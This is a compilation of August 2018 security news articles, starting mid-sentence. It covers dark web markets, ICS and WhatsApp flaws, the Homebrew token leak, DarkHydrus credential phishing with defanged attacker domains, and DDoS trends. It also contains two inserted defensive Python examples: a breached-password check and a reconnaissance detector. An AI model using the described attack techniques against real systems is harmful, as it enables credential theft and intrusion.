“G Suite admins have an important role in protecting their users’ accounts and ensuring their organization’s security. To succeed, they need visibility into user account actions. That’s why we’re adding reports in the G Suite Admin console that surface more information on user account activity,” Google notes.

A Guided Tour of the Asian Dark Web
9.8.2018 securityweek Cyber

The Asian dark web is not well known. Most people just think of Russia when thinking about underground hacking forums. To gain a better understanding of Asian onion sites and black markets, researchers from IntSights embarked on a six-month long investigation and analysis.

The results, published this week at Black Hat, show a diverse, culturally sensitive and wider than perhaps expected Asian dark web. Along with the report, IntSights' director of threat research, Itay Kozuch, took SecurityWeek on a guided tour of the Asian dark web.

We started at the Hidden Wiki, a South Korean page that bookmarks other sites in the dark web all over the world. "It's been live for a few years, and is being maintained on a regular basis," explained Kozuch. The page is organized in sections and even provides an 'editor's choice' selection. It provides links to whatever the existing or budding hacker or underworld character might be looking for: bank accounts, card details, advice, drugs, porn, fake passports and IDs, UK driving licenses, firearms and more.

"It's a good place to start a foray into the dark web," said Kozuch. Despite this expansive index onto the blacker parts of the dark web, the IntSights report notes that "at the moment, there are no significant threat actors that operate out of South Korea."

Our next stop was deeper into the dark web: Mushroom, a Chinese black-market site specializing in the sale of drugs. "The most important feature for the researcher," continued Kozuch, "are the prices. They are all in Chinese Yuan, not as we usually see in dark websites, bitcoin or other cryptocurrency." This is because cryptocurrencies are forbidden in China and the site primarily serves Chinese nationals -- although it does offer advice on how to obtain bitcoin and is willing to ship produce outside of China. The price is also 30% to 40% lower than is typically found in western black markets.

From there we moved to Japan. The Japanese dark web has one major difference from other parts: it is remarkably polite. "Many Japanese users view it as an alternate universe," says the report, "where they can express themselves and have harmless discussions, just behind the mask of an anonymous avatar. It is not uncommon to see diaries and blogs on the Japanese dark web." It is more about obtaining things, such as drugs and porn, than about facilitating hacking. One site even asks the visitor to suggest a price for the products.

We visited the Japanese branch of Anonymous, which is a bit of an exception. "Its primary purpose is protest against the Japanese government on environmental issues," explained Kozuch. Two current ops are Hope Japan and Hope Fukushima. "Anonymous accuses the Japanese government of hiding information about what really happened in the nuclear plant, and the extent of pollution in the seas around Japan." The website directly calls for attacks against Japanese government websites, and Anonymous is willing to provide what is necessary -- methodologies for DDoS, SQLi, XSS and other attack vectors.

We then visited another Japanese-language site that is a bit different -- a site that buys and sells information, focusing on military intelligence, documents, protocols, science, and technology. "What's really remarkable," added Kozuch, "is that this site is not typically Japanese in flavor. Japanese sites usually handle drugs and porn." After analyzing the style and content, "we came to the conclusion that this is not a Japanese website at all. The Japanese would never be so direct and forthright. We suspect that the people behind it are North Korean, which has its problems with Japan." The report adds that it may be a North Korean (or Chinese) group "that is attempting to gather intelligence for some attack on or operation in Japan."

We also visited another Anonymous site in Thailand (this one is offering a free database of 30,000 FBI and DHS officers stolen in 2016); and a hacking forum/black market in Indonesia (providing free downloads of malware and exploits).

The main focus, however, was on China, and we visited three more websites. Surprisingly, none of these are onion sites. They are dark sites to anybody outside of China because of the Chinese firewall, but in the clear web to Chinese nationals. The first offers DDoS as a packaged service -- a fairly unique offering selling different options of strength and duration. "The largest offering," Kozuch pointed out, "is for a 500 Gb attack with unlimited connections."

The second, known as QQ, is a hacking forum designed as a combination of different social media platforms and providing communication tools such as QQ groups, QQ forums and private chatrooms.

The last was Hack80, a hacking forum more in line with the better known Russian underground forums. "It offers everything you might find in the traditional Russian hacking forums," said Kozuch: "bitcoin mining tutorials, hacker toolkits, malware and so on. You can ask about and get almost anything -- if you're Chinese, of course. You cannot ask questions or get answers in English." This isn't surprising since the site is in the clear web, and thus only visible to Chinese nationals (IntSights was using a very specific VPN for the research and this tour).

Kozuch believes it is time for the West to take the Chinese dark web more seriously. "We usually like to look at the North Koreans and the Russians as the primary attackers; but I believe that the Chinese offer is more sophisticated with more capability than we have realized. Many of the next threats that we are going to see will come from China."

The fact that so many dark Chinese sites are on the Chinese clear web raises the question of collusion between the hackers and the government. Kozuch does not believe that the existence of hacking sites in the clear web automatically means they are permitted by the government, or that the hackers work for the government. It is perfectly feasible for these sites to hide in plain sight given the size of the Chinese internet.

"I think there is a big element of private cybercrime groups that operate from China that we were simply not aware of," he told SecurityWeek. "It is more comfortable to blame the APT groups we already know about, but I think this research shows how much knowledge and how much capability that private groups have, and how they communicate and what kind of tools they are using."

He suspects that we often automatically blame APT groups simply because the attack comes from China; but the perpetrator may well be an unknown private group. "Usually, APT groups (with the exception of North Korea) are not after money -- they're after intelligence or to steal intellectual property. I believe that in some cases there are Chinese threat actors that we simply aren't aware of." As in Russia, many of the Chinese threat actors will focus on targets outside of China so as not to draw the attention -- and ire -- of the local police.

But this doesn't mean there is no collusion at all between the criminal groups and the Chinese government. "I haven't found any evidence that private groups are sub-contracting for the government," he continued, "but I really believe that it is happening -- like in many other places around the world. Sometimes the government doesn't have all the capabilities it needs, so it uses sub-contractors who will deliver the skills provided the government allows them to continue their own operations outside of China. There are examples of known Chinese hackers that are now running their own security firms. Nobody turns from crime life to become whitehats for no reason and without any consequences. I really believe that there are all kinds of groups that enjoy government protection because they provide services to the government when it needs it. Give and take rules."

"The Asian dark web," concludes the IntSights research, "is relatively small compared to its counterparts in Western countries, such as the United States and Europe. However, this doesn't mean that it poses less of a threat. In fact, due to the laws and political motivations of these countries, the risk to non-Asian companies is significantly higher."

Israel-born startup IntSights Cyber Intelligence raised $17 million in a Series C funding round led by Tola Capital in June 2018, bringing the total capital raised by the firm to $41.3 million. IntSights was founded in 2015 by Alon Arvatz, Gal Ben David, and Guy Nizan.

Flaws in Siemens Tool Put ICS Environments at Risk
9.8.2018 securityweek ICS

Serious vulnerabilities discovered by researchers in Siemens’ TIA Portal for SIMATIC STEP7 and SIMATIC WinCC can be exploited by threat actors for lateral movement and other purposes in ICS environments.

The TIA Portal (Totally Integrated Automation Portal) is a piece of software from Siemens that gives organizations unrestricted access to the company’s automation services.

Researchers at industrial cybersecurity firm Nozomi Networks discovered that the default installation of the TIA Portal is affected by two high severity improper file permission vulnerabilities.

One of them, CVE-2018-11453, allows an attacker with access to the local file system to insert specially crafted files that can cause the TIA Portal to enter a denial-of-service (DoS) condition or allow the hacker to execute arbitrary code. Exploiting the flaw does not require special privileges, but the victim needs to attempt to open the TIA Portal for the exploit to be triggered, Siemens said in its advisory.

Nozomi Co-founder and Chief Technology Officer Moreno Carullo told SecurityWeek that the company sent a proof-of-concept (PoC) to ICS-CERT and Siemens that shows how this security hole can be exploited for code execution.

The second vulnerability, CVE-2018-11454, is related to an improper file permission configuration issue in specific TIA Portal directories.

“[The flaw] may allow an attacker with local privileges in the machine where the software is installed to manipulate the resources inside the misconfigured directories (e.g., adding a malicious payload),” Carullo explained. “While a legitimate user uses the software suite to transfer configuration (in a licit way) to the targeted device, using the TIA Portal software, a maliciously-added file would be automatically executed by the remote device.”

Siemens has released updates for SIMATIC STEP7 and SIMATIC WinCC versions 14 and 15 to address the vulnerabilities. For earlier versions, users can prevent exploitation by restricting operating system access to authorized users, and processing GDS files only from trusted sources.

Nozomi believes these types of flaws can pose a significant risk to ICS environments.

“These types of flaws may enable an advanced persistent threat (APT) to be installed in the ICS and act by itself hidden from regular ICS engineers in a plant. So it could be used to build bigger malwares,” Carullo said.

Leaked GitHub API Token Exposed Homebrew Software Repositories
9.8.2018 securityweek Hacking

A GitHub API token leaked from Homebrew’s Jenkins provided a security researcher with access to core Homebrew software repositories (repos).

Around since 2009, Homebrew is a free and open-source software package management system that runs from the command line and allows for simple installation of software on macOS machines.

On July 31, 2018, security researcher Eric Holmes discovered that an exposed token provided him with commit access to Homebrew/brew, Homebrew/homebrew-core, and Homebrew/formulae.brew.sh repositories.

With hundreds of thousands of people using Homebrew, the potential impact of the compromise could have been disastrous. By modifying a highly popular package, such as openssl, the researcher could have pushed malicious code directly to a large number of users.

“If I were a malicious actor, I could have made a small, likely unnoticed change to the openssl formulae, placing a backdoor on any machine that installed it,” Holmes explained.

The issue, which was addressed the same day that it was discovered, did not result in compromised packages, Homebrew lead maintainer Mike McQuaid reveals.

The exposed token had elevated scopes, but the GitHub Support team has verified that it hasn’t been used to perform any pushes to Homebrew/brew or Homebrew/homebrew-core.

“Within a few hours the credentials had been revoked, replaced and sanitised within Jenkins so they would not be revealed in future. Homebrew/brew and Homebrew/homebrew-core were updated so non-administrators on those repositories cannot push directly to master,” McQuaid says.

He also explains that the team enforced stronger security by updating most repositories in the Homebrew organization “to require CI checks from a pull request to pass before changes can be pushed to master.”

In addition to enabling branch protection and requiring reviews on additional repositories, the Homebrew team also required all maintainers to review and prune their personal access tokens and disable SMS fallback for 2FA.

“We try our best to behave as a for-profit company would do in terms of timely response to security issues but this is heavily limited by our lack of resources. For example, in this case the Homebrew maintainer who resolved the above issues was on paternity leave from work and the primary carer for their child and had to reach a quick resolution while their child had a nap,” McQuaid notes.

In the wake of recent incidents with compromised Gentoo Linux and Arch Linux AUR repositories, it is increasingly clear that malicious actors can cause a great deal of damage by targeting the supply chain. This is exactly what last year’s CCleaner and NotPetya attacks demonstrated as well.

“This is my growing concern, and it’s been proven time and time again that package managers, and credential leaks, are a weak point in the security of the internet, and that supply chain attacks are a real and persistent threat. This is not a weakness in Homebrew, but rather a systemic problem in the industry, and one where we need more security research,” Holmes concludes.

Researchers find vulnerabilities in WhatsApp that allow spreading fake news via group chats
9.8.2018 securityaffairs

WhatsApp has been found vulnerable to multiple security flaws that could allow malicious users to spread fake news through group chats.
WhatsApp, the most popular messaging application in the world, has been found vulnerable to multiple security flaws that could allow malicious users to intercept and modify the content of messages sent in both private and group conversations.

Researchers at security firm Check Point have discovered several vulnerabilities in the popular instant messaging app WhatsApp. The flaws stem from a bug in the app's security protocols and allow messages to be modified.

An attacker could exploit the flaws “to intercept and manipulate messages sent by those in a group or private conversation” as well as “create and spread misinformation”.

The issues affect the way the WhatsApp mobile application communicates with WhatsApp Web and decrypts messages encoded with the protobuf2 protocol.

The flaws allow hackers to abuse the ‘quote’ feature in a WhatsApp group conversation to change the identity of a sender, alter the content of a member’s reply in a group chat, or send a private message to one group member disguised as a group message.

Experts pointed out that the flaws cannot be exploited to access the content of end-to-end encrypted messages, and that in order to exploit them the attackers must already be part of the group conversation.

“Check Point researchers have discovered a vulnerability in WhatsApp that allows a threat actor to intercept and manipulate messages sent by those in a group or private conversation.” reads the blog post published by the experts.

“The vulnerability so far allows for three possible attacks:

Changing a reply from someone to put words into their mouth that they did not say.
Quoting a message in a reply to a group conversation to make it appear as if it came from a person who is not even part of the group.
Sending a message to a member of a group that pretends to be a group message but is in fact only sent to this member. However, the member’s response will be sent to the entire group.”

The experts demonstrated the exploitation of the flaws by changing a WhatsApp chat entry sent by one member of a group.

Below is a video PoC that shows how WhatsApp chats can be modified and demonstrates the three different attacks.

The Check Point research team (Dikla Barda, Roman Zaikin, and Oded Vanunu) developed a custom extension for the popular tool Burp Suite, dubbed WhatsApp Protocol Decryption Burp Tool, to intercept and modify encrypted messages in WhatsApp Web.

“By decrypting the WhatsApp communication, we were able to see all the parameters that are actually sent between the mobile version of WhatsApp and the Web version. This allowed us to then be able to manipulate them and start looking for security issues,” the experts state.

The extension is available on GitHub; it requires the user to supply their own private and public keys.

“The keys can be obtained from the key generation phase from WhatsApp Web before the QR code is generated:” continues the report published by the experts.

“After we take these keys we need to take the “secret” parameter which is sent by the mobile phone to WhatsApp Web while the user scans the QR code:”

Experts demonstrated that using their extension an attacker can:

Change the content of a group member’s reply.
Change the identity of a sender in a group chat. The attack works even if the impersonated person is not a member of the group: “Use the ‘quote’ feature in a group conversation to change the identity of the sender, even if that person is not a member of the group.”
Send a private message to one member of a group that looks like a group message; when the recipient replies, the whole group sees the reply.

The experts reported the flaws to WhatsApp, but the company explained that end-to-end encryption is not broken by the attacks.

“We carefully reviewed this issue and it’s the equivalent of altering an email to make it look like something a person never wrote.” WhatsApp said in a statement.

“This claim has nothing to do with the security of end-to-end encryption, which ensures only the sender and recipient can read messages sent on WhatsApp.”

“These are known design trade-offs that have been previously raised in public, including by Signal in a 2014 blog post, and we do not intend to make any change to WhatsApp at this time,” the WhatsApp security team replied to the researchers.

Check Point's experts argue that the flaws could be abused to spread fake news and misinformation and that, for this reason, it is essential to fix them as soon as possible, in addition to putting limits on forwarded messages.

GitHub started warning users when they use compromised credentials
9.8.2018 securityaffairs Incident

In order to improve the security of its users, the popular software code hosting service GitHub is now alerting account holders whenever it detects that a password has been exposed by data breaches on other services.
Last week, the popular software code hosting service GitHub introduced a new feature to protect its users: it alerts them whenever it detects that a password has been compromised in a third-party data breach.

GitHub has teamed up with the HaveIBeenPwned.com service, run by cybersecurity expert Troy Hunt, to implement a feature that allows users to check whether their credentials have been involved in known data breaches.

“Common password advice is to use a long and unique password for each website you have an account with. It’s challenging to remember a strong and unique password for each website without either using a password manager or using a trivially discovered theme. As a result, password reuse is extremely prevalent. Regardless of the strength of a password, a single breach can nullify its security when used elsewhere.” reads the advisory published by GitHub.

“While Troy hosts a service that people and services can use to check for compromised passwords, he also generously made the approximately 517 million record dataset available for download. Using this data, GitHub created an internal version of this service so that we can validate whether a user’s password has been found in any publicly available sets of breach data.”

GitHub has developed a service that leverages the 517-million-record dataset provided by Hunt to “validate whether a user’s password has been found in any publicly available sets of breach data.”

GitHub account check

The feature alerts users who are using compromised credentials and asks them to change their password during login, registration, or a password change.

GitHub stores passwords hashed with the bcrypt algorithm.

“Don’t worry, your password is protected by the password hashing function bcrypt in our database. We only verify whether your password has been compromised when you provide it to us,” continues GitHub.
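As an added illustration of the check GitHub describes (example code written here, not GitHub's or HaveIBeenPwned's own), the following Python builds a lookup index from a local copy of the breached-password list in the Pwned Passwords download format and screens a candidate password before it is accepted; the dataset lines are constructed, and the bcrypt storage step is not shown.

```python
"""Compromised-password check modelled on the feature described above.

Added example, not GitHub's or HaveIBeenPwned's own code. It assumes a local
copy of the breached-password list in the Pwned Passwords download format,
one "<SHA-1 hex>:<prevalence count>" record per line.
"""
import hashlib
from typing import Dict, Iterable, Tuple

PREFIX_LEN = 5  # bucket records by the first 5 hex chars (20 bits) of the SHA-1


def sha1_hex(password: str) -> str:
    """SHA-1 of the UTF-8 password, upper-case hex as the dataset uses."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def load_index(lines: Iterable[str]) -> Dict[str, Dict[str, int]]:
    """Parse dataset lines into {prefix: {suffix: count}}.

    Bucketing by prefix keeps each lookup to one small dictionary;
    malformed lines are skipped rather than aborting the load.
    """
    index: Dict[str, Dict[str, int]] = {}
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, count = line.partition(":")
        digest = digest.upper()
        if sep != ":" or len(digest) != 40 or not count.isdigit():
            continue  # not a "<sha1>:<count>" record
        bucket = index.setdefault(digest[:PREFIX_LEN], {})
        bucket[digest[PREFIX_LEN:]] = int(count)
    return index


def breach_count(password: str, index: Dict[str, Dict[str, int]]) -> int:
    """How many times the password appeared in known breaches (0 = never)."""
    digest = sha1_hex(password)
    return index.get(digest[:PREFIX_LEN], {}).get(digest[PREFIX_LEN:], 0)


def check_password(password: str, index: Dict[str, Dict[str, int]]) -> Tuple[bool, str]:
    """Decision a login, registration or password-change flow can act on.

    Returns (accepted, reason). The plaintext is hashed with SHA-1 only for
    the lookup; what gets stored would still be a bcrypt hash (not shown).
    """
    seen = breach_count(password, index)
    if seen:
        return False, f"password found in breach data {seen} time(s); choose another"
    return True, "password not found in known breach data"


# Constructed sample dataset: SHA-1 of three notoriously common strings with
# made-up counts, plus a malformed line to show that it is ignored.
SAMPLE_LINES = [
    f"{sha1_hex('password')}:3730471",
    f"{sha1_hex('123456')}:23547453",
    f"{sha1_hex('letmein')}:236621",
    "not a record",
]
INDEX = load_index(SAMPLE_LINES)

if __name__ == "__main__":
    for candidate in ("password", "Tr0ub4dor&3", "letmein"):
        ok, why = check_password(candidate, INDEX)
        print(f"{candidate!r}: {'accept' if ok else 'reject'} ({why})")
```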

GitHub encourages the use of two-factor authentication (2FA); users who have enabled it will receive periodic warnings to review their 2FA setup and recovery options.

“If you have two-factor authentication enabled, GitHub will now periodically remind you to review your 2FA setup and recovery options. We highly recommend using a 2FA authenticator application that supports cloud backups in the event your phone is lost, stolen, or falls in the ocean.” continues the advisory.

In June, Microsoft announced the acquisition of GitHub for $7.5 billion in Microsoft stock, and the hosting service is improving its security by introducing new measures, including enforcing SSL/TLS.

Snapchat source code leaked after an iOS update exposed it
9.8.2018 securityaffairs

Hackers leaked the Snapchat source code on GitHub, after they attempted to contact the company for a reward.
Hackers gained access to the source code of the frontend of the Snapchat instant messaging app for iOS and leaked it on GitHub.

A GitHub account associated with a person named Khaled Alshehri, who claimed to be from Pakistan and uses the handle i5xx, created a GitHub repository titled Source-Snapchat.

After being notified, Snap Inc. confirmed the authenticity of the source code and asked GitHub to remove it by filing a DMCA (Digital Millennium Copyright Act) request.

“Please provide a detailed description of the original copyrighted work that has allegedly been infringed. If possible, include a URL to where it is posted online.”


SnapChat source code

According to Snapchat, the source code was leaked after an iOS update made in May that exposed a “small amount” of the app source code. The problem was solved and Snap Inc ensured that the data leak has no impact on the Snapchat users.

The hackers who leaked the source code are threatening to release further parts of the leaked code until Snap Inc replies; they are likely blackmailing the company.

SnapChat source code

Two members of the group who leaked the Snapchat source code have been posting messages written in Arabic and English on Twitter.

The two hackers are allegedly based in Pakistan and France; they expected a bug bounty reward from the company but did not receive one.

At the time of writing, two other forks containing the source code are still present on GitHub; it seems that the code was published just after the iOS update.

Snapchat currently runs an official bug bounty program through HackerOne and has already paid several rewards for critical vulnerabilities in its app.

Flaw in BIND Security Feature Allows DoS Attacks
9.8.2018 securityweek

The Internet Systems Consortium (ISC) revealed on Wednesday that the BIND DNS software is affected by a serious vulnerability that can be exploited for denial-of-service (DoS) attacks.

The flaw, discovered by Tony Finch of the University of Cambridge and tracked as CVE-2018-5740, can be exploited remotely and has been assigned a CVSS score of 7.5, which makes it “high severity.”

However, the vulnerability only impacts servers on which a feature called “deny-answer-aliases” has been enabled. The feature is disabled by default.

The “deny-answer-aliases” feature is designed to help recursive server operators protect users against DNS rebinding attacks. These types of attacks allow a remote hacker to abuse the targeted user’s web browser to directly communicate with devices on the local network and exploit any flaws they might have.

“Accidental or deliberate triggering of this defect will cause an INSIST assertion failure in named, causing the named process to stop execution and resulting in denial of service to clients,” ISC wrote in its advisory.

The security hole impacts BIND versions 9.7.0 through 9.8.8, 9.9.0 through 9.9.13, 9.10.0 through 9.10.8, 9.11.0 through 9.11.4, 9.12.0 through 9.12.2, and 9.13.0 through 9.13.2. A patch is included in versions 9.9.13-P1, 9.10.8-P1, 9.11.4-P1 and 9.12.2-P1. As a workaround, ISC suggests disabling the problematic feature if it has been used.

“Most operators will not need to make any changes unless they are using the ‘deny-answer-aliases’ feature. ‘deny-answer-aliases’ is off by default; only configurations which explicitly enable it can be affected by this defect,” ISC said.

The organization says it’s not aware of any instances where this vulnerability has been exploited for malicious purposes. Potentially affected users were notified of the flaw in advance, on July 31.

Reconnaissance, Lateral Movement Soar in Manufacturing Industry
9.8.2018 securityweek ICS

An unusually high volume of malicious internal reconnaissance and lateral movement has been observed in the manufacturing industry, which experts believe is a result of the rapid convergence between IT and OT networks.

The data comes from the 2018 Spotlight Report on Manufacturing released on Wednesday by threat detection company Vectra. The report is based on observations from another report released on Wednesday by the company, the 2018 Black Hat Edition of the Attacker Behavior Industry Report, which shows attacker behavior and trends across nine industries.

The Attacker Behavior Industry Report shows that Vectra has detected a significant number of threats in manufacturing companies. This industry has generated the third highest number of detections, after the education and energy sectors.

Threats by industry per 10,000 host devices

The cybersecurity firm has focused on botnets, command and control (C&C) traffic, data exfiltration, reconnaissance and lateral movement.

In the case of manufacturing organizations, it discovered a significant volume of malicious internal behavior, which suggests that adversaries are already inside the network. For example, Vectra noted that in many instances there was twice as much lateral movement as C&C traffic.

“These behaviors reflect the ease and speed with which attacks can proliferate inside manufacturing networks due to the large volume of unsecured IIoT devices and insufficient internal access controls,” Vectra said in its report. “Most manufacturers do not invest heavily in security access controls for business reasons. These controls can interrupt and isolate manufacturing systems that are critical for lean production lines and digital supply chain processes.”

Many factories connect their industrial internet of things (IIoT) systems to regular computers and enterprise applications for data telemetry and remote management purposes. The use of widely used protocols instead of proprietary protocols makes it easier for malicious actors to infiltrate networks, spy on the targeted organization, and steal data, Vectra said.

According to the company, a recently observed spike in internal reconnaissance in the manufacturing sector was the result of internal darknet scans and SMB account scans. Internal darknet scans are when a device on the network looks for internal IP addresses that do not exist, while SMB account scans occur when a host quickly uses multiple accounts via the SMB protocol.

“Manufacturing networks consist of many gateways that communicate with smart devices and machines. These gateways are connected to each other in a mesh topology to simplify peer-to-peer communication. Cyberattackers leverage the same self-discovery used by peer-to-peer devices to map a manufacturing network in search of critical assets to steal or damage,” Vectra said.

As for lateral movement, the company has seen a wide range of activities, but the most common are SMB brute-force attacks, suspicious Kerberos clients, and automated replication, which occurs when an internal host sends similar payloads to multiple systems on the network.
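The two reconnaissance behaviours the report defines above, internal darknet scans and SMB account scans, as detection logic over constructed event records (an added example, not Vectra's own detection code; the event shapes, thresholds and window lengths are assumptions chosen for the demo):

```python
"""Detection logic for two internal reconnaissance behaviours: internal
darknet scans (a host probing internal IPs where no device answers) and SMB
account scans (a host presenting many different accounts over SMB quickly).

Added example, not Vectra's detection code. Event shapes, thresholds and
window sizes are assumptions for the demo; all events are constructed.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class ConnEvent:
    ts: float       # seconds since epoch
    src: str        # internal host that initiated the connection
    dst: str        # internal IP it tried to reach
    answered: bool  # False = nothing responded, i.e. a "dark" address


@dataclass(frozen=True)
class SmbAuthEvent:
    ts: float
    src: str
    account: str    # account name presented over SMB


def _peak_distinct_in_window(items: List[Tuple[float, str]], window_s: float) -> int:
    """Largest number of distinct values in any window_s-long span.
    items must be sorted by timestamp; sliding window keeps this linear."""
    window: Deque[Tuple[float, str]] = deque()
    counts: Dict[str, int] = defaultdict(int)
    peak = 0
    for ts, value in items:
        window.append((ts, value))
        counts[value] += 1
        while window and ts - window[0][0] > window_s:
            _, old_value = window.popleft()
            counts[old_value] -= 1
            if counts[old_value] == 0:
                del counts[old_value]
        peak = max(peak, len(counts))
    return peak


def detect_darknet_scans(events: Iterable[ConnEvent], window_s: float = 60.0,
                         min_dark_hosts: int = 20) -> Dict[str, int]:
    """Sources that touched >= min_dark_hosts distinct *unanswered* internal
    IPs inside one window. Returns {src: peak distinct dark destinations}."""
    by_src: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        if not e.answered:            # answered connections are not "dark"
            by_src[e.src].append((e.ts, e.dst))
    hits: Dict[str, int] = {}
    for src, items in by_src.items():
        peak = _peak_distinct_in_window(items, window_s)
        if peak >= min_dark_hosts:
            hits[src] = peak
    return hits


def detect_smb_account_scans(events: Iterable[SmbAuthEvent], window_s: float = 30.0,
                             min_accounts: int = 5) -> Dict[str, int]:
    """Hosts that presented >= min_accounts distinct SMB accounts inside one
    window. Returns {src: peak distinct accounts}."""
    by_src: Dict[str, List[Tuple[float, str]]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_src[e.src].append((e.ts, e.account))
    hits: Dict[str, int] = {}
    for src, items in by_src.items():
        peak = _peak_distinct_in_window(items, window_s)
        if peak >= min_accounts:
            hits[src] = peak
    return hits


def build_sample_events() -> Tuple[List[ConnEvent], List[SmbAuthEvent]]:
    """Constructed traffic: one sweeping host and one ordinary workstation."""
    conns: List[ConnEvent] = []
    # 10.0.5.17 sweeps 10.0.9.1-40 every half second; nothing lives there.
    for i in range(1, 41):
        conns.append(ConnEvent(1000.0 + i * 0.5, "10.0.5.17", f"10.0.9.{i}", False))
    # 10.0.5.20 talks to three real servers and once mistypes an address.
    for i, dst in enumerate(["10.0.1.5", "10.0.1.6", "10.0.1.7"]):
        conns.append(ConnEvent(1000.0 + i, "10.0.5.20", dst, True))
    conns.append(ConnEvent(1010.0, "10.0.5.20", "10.0.1.75", False))
    smb: List[SmbAuthEvent] = []
    # The sweeping host also tries eight accounts over SMB within 8 seconds.
    for i, acct in enumerate(["administrator", "backup", "svc_hmi", "plc_ops",
                              "jsmith", "guest", "it_admin", "scada"]):
        smb.append(SmbAuthEvent(2000.0 + i, "10.0.5.17", acct))
    for i in range(10):  # the workstation authenticates as one user repeatedly
        smb.append(SmbAuthEvent(2000.0 + i * 3, "10.0.5.20", "jsmith"))
    return conns, smb


if __name__ == "__main__":
    conns, smb = build_sample_events()
    print("internal darknet scans:", detect_darknet_scans(conns))
    print("SMB account scans:", detect_smb_account_scans(smb))
```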

“IIoT systems make it easy for attackers to move laterally across a manufacturing network, jumping across non-critical and critical subsystems, until they find a way to complete their exploitative missions,” the firm explained.

DarkHydrus Uses Open Source Phishery Tool in Middle-East Attacks
9.8.2018 securityweek

The recently detailed DarkHydrus threat group is leveraging the open-source Phishery tool to create malicious documents used in attacks on government entities in the Middle East, Palo Alto Networks warns.

Just weeks ago, the security firm revealed that the actor is employing numerous free or open-source utilities for its malicious purposes. It has leveraged tools such as Meterpreter, Mimikatz, PowerShellEmpire, Veil, and CobaltStrike, as well as a PowerShell-based backdoor called RogueRobin.

With a focus on credential harvesting, the attacker(s) employs spear-phishing emails to deliver malicious Office documents and is using an infrastructure dating back to fall 2017.

The malicious documents, which use the attachedTemplate technique, load a template from a remote, attacker-controlled location to prompt users to provide login credentials. The login information is then sent to the attacker’s server.

Last year, the FBI and the DHS issued a joint report warning of cyber-attacks targeting energy facilities in the U.S. and elsewhere and leveraging the same template injection technique. Those attacks, however, were attributed to a different actor.

Palo Alto Networks’ security researchers believe that DarkHydrus used the open-source Phishery tool to create two of the Word documents observed in the credential harvesting attacks.

One of these attacks was observed on June 24, 2018, targeting an educational institution in the Middle East. The subdomain (of attacker-controlled 0utl00k[.]net) used in this incident was the domain of the targeted educational institution, which made the malicious document and the authentication request look credible.

The security researchers discovered additional documents that employed the same malicious domain for credential harvesting and say that the malicious campaign has been ongoing for almost a year.

Previously, Palo Alto Networks uncovered additional domains the threat actor has been using in assaults, including anyconnect[.]stream, Bigip[.]stream, Fortiweb[.]download, Kaspersky[.]science, microtik[.]stream, owa365[.]bid, symanteclive[.]download, and windowsdefender[.]win.

The RogueRobin backdoor, the security firm says, can determine whether it runs in a sandbox. It provides attackers with various remote administration capabilities, including file upload, PowerShell command execution, DNS queries, download of content from the command and control (C&C) server, and the addition of PowerShell modules to the script.

The researchers were able to confirm that the Phishery tool was used to create DarkHydrus documents. The open-source utility allows for the injection of remote template URLs into Word documents and is also capable of hosting a C&C server to gather the user-provided credentials.

“We discovered DarkHydrus carrying out credential harvesting attacks that use weaponized Word documents, which they delivered via spear-phishing emails to entities within government and educational institutions. This threat group not only used the Phishery tool to create these malicious Word documents, but also to host the C2 server to harvest credentials,” Palo Alto Networks concluded.

DDoS Attacks Less Frequent But Pack More Punch: Report
8.8.2018 securityweek Attack

There were seven times more distributed denial-of-service (DDoS) attacks larger than 300 Gbps (gigabits per second) observed during the first six months of 2018 compared to the first half of 2017, NETSCOUT Arbor reveals.

According to the security company’s latest threat intelligence report, the number of large DDoS attacks jumped from 7 to 47 year-over-year in the first half of 2018, and the average DDoS attack size grew 174% during that period. The overall frequency of attacks, however, went down 13%.

The overall attack size was driven by novel techniques and has increased 37% since memcached amplification appeared (it fueled a 1.7 Tbps attack earlier this year). Between March and June 2018, the number of vulnerable (and accessible) memcached servers dropped from 17,000 to 550.

Although it has been used for reflection/amplification for years, Simple Service Discovery Protocol (SSDP) has received increased attention this year, when it was used to deliver traffic from ephemeral source ports. There are around 33,000 SSDP reflectors that could be abused in attacks, the report reveals (PDF).

The rise of Internet of Things (IoT) devices, most of which lack proper protection, use default credentials and are plagued with both known and unknown software vulnerabilities, is expected to continue to fuel a growth in IoT botnets such as Mirai, which has spawned numerous variants over the past two years.

Attack targets have diversified, with verticals such as finance, gaming, and e-commerce being most likely to be targeted. Telecommunications providers observed the largest number of incidents, and data hosting services were also targeted.

“Today, any organization, for any real or perceived offense or affiliation, can become a target of a DDoS attack,” NETSCOUT Arbor says.

In addition to DDoS attacks, cybercrime and nation-state espionage attacks represent other types of threats posing high risks to organizations and consumers alike.

“Over the past 18 months, internet worms, supply chain attacks, and customer premises equipment (CPE)/IoT compromises have opened up internet-scale threat activity. Nation-state APT groups continue to develop globally, used as another means of state-craft and often targeting governments and institutions of geo-strategic relevance,” the report reads.

Targeting newly discovered vulnerabilities in Office, the Iran-based threat actor OilRig has been highly active over the past year. Russian-linked cyber-group Fancy Bear wasn’t dormant either, with the most noteworthy attack recently attributed to it being the VPNFilter malware campaign.

Hidden Cobra, the North Korean threat actor also known as the Lazarus Group, has been observed targeting crypto-currency exchanges, as well as Central and South American banks. Operating out of Vietnam, Ocean Lotus has been actively targeting government and finance sectors over the past year.

The crimeware sector too remains robust and NETSCOUT Arbor expects it to spread beyond its traditional attack methods. There’s an increase in the use of auto-propagation methods, which have already fueled massive malware distribution campaigns such as last year’s WannaCry and NotPetya.

“The hunger for exploitation of new vectors will also continue, as we have seen in the immense DDoS attack impact created by Memcached earlier this year,” NETSCOUT Arbor says.

The security firm also expects an increase in SSDP abuse for internal intrusion, as well as growth in the “use of legitimate software programs by espionage groups and the addition of secondary tactics such as adding crypto-currency mining by crimeware actors.”

Let's Encrypt Now Trusted by All Major Root Programs
8.8.2018 securityweek Safety

Let’s Encrypt’s root, ISRG Root X1, is now trusted by all major root programs, including Microsoft, Google, Apple, Mozilla, Oracle, and Blackberry.

Let’s Encrypt is a free, automated, and open Certificate Authority (CA) backed by the Linux Foundation that provides website owners with free digital certificates for their sites and handles the certificate management process for them.

